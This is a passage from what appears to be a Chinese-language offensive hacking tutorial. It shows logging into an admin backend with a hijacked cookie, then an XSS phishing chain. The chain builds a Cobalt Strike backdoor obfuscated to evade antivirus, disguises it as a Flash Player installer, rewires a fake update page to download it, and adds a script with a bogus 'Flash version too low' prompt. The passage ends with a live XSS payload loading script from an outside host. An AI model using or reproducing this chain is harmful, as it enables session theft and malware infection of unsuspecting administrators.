send执行后,通过cookie进入到了管理员后台!
复制URL!
浏览器中访问后,正常进入管理员后台!
四、利用XSS钓鱼 1、搭建Flash钓鱼页面
在公网服务器搭建钓鱼页面,任何能访问互联网客户都可以访问该页面!
2、生成免杀后门
利用Cobal Strike生成C#语言的shell...
利用该shell进行混淆,并利用python的tinyaes模块混淆也行,在来个分离免杀,最后利用pyinstaller生成exe外壳...必过全国杀毒软件!(不演示过程)
将flash修改名字为:flashplayer_install_cn.exe(或者修改为update等吸引人下载的名称都行)
这是Flash贷款平台源码文件目录!!
修改index.html代码,找到其中href="进行修改为:flashplayer_install_cn.exe 意思就是点击页面立即下载就能自动下载目录下的exe后门文件!
在准备个js文件,意思是执行该js后,会在页面提示:
您的 FLASH 版本过低,尝试升级后访问该页面!
并访问到该页面:
将exe和js都上传到功能网服务器apache底层!
测试访问可看到正常读取,确保内网管理员能执行XSS后访问到js文件,这里就可以开始了!
可看到利用(三)中XSS利用的方法,执行插入:
"><sCRiPt sRC=http://flash.dayuixiyou.cn/flash-test.js></sCrIpT><"
#需要前后加入闭合 "> <"